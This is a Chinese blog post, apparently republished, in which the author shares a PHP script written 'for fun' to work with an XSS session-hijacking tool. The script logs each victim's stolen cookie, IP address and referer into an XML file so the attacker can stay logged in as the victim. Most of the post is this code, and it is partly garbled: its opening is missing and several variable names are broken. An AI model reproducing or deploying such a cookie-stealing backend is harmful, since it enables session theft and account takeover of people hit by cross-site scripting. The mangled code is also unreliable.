我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xss利用工具,类似老外的hamster,在客户端定时刷新保持session不超时。被跨站的人只要访问一次之后,攻击 者就可以一直保持登陆的状态。他这个工具用.net做的,为了方便,要求收集cookie的脚本把cookie保存为xml文件。他提供了一个asp程 序,我只有php空间,因此写了个php的作测试用。 代码: load( $my_file ); $doc->formatoutput = true; $treeroot = $doc->getelementsbytagname( “treeroot” )->item(0); $item = $doc->createelement( “item” ); $treeroot->appendchild( $item ); if( isset( $_server[“remote_host”] ) ) { $remote_host = $_server[“remote_host”]; } elseif( isset( $_server[“remote_addr”] ) ) { $remote_host = $_server[“remote_addr”]; } else { $remote_host = “notcare”; } $title = $doc->createelement( “title”, $remote_host ); $item->appendchild( $title ); if( isset( $_server[“http_referer”] ) ) { $refer = $_server[“http_referer”]; } else { $refer = “http://yahoo.cn”; } $link = $doc->createelement( “link”, $refer ); $item->appendchild( $link ); $src_ip = $doc->createelement( “src_ip”, $_server[“remote_addr”] ); $item->appendchild( $src_ip ); $src_os = $doc->createelement( “src_os”, “notcare” ); $item->appendchild( $src_os ); $pubdate = $doc->createelement( “pubdate”, date( “r” ) ); $item->appendchild( $pubdate ); $description = $doc->createelement( “description”, $my_cookie ); $item->appendchild( $description ); $doc->save( $my_file ); }
?>
http://www.bkjia.com/phpjc/532402.htmlwww.bkjia.comtruehttp://www.bkjia.com/phpjc/532402.htmltecharticle我写的这个纯粹是好玩,没啥意思,说到底就是操作xml而已。缘起还是归结于前几天http://www.cncert.net在 我们的邮件列表发布了一个新的xs…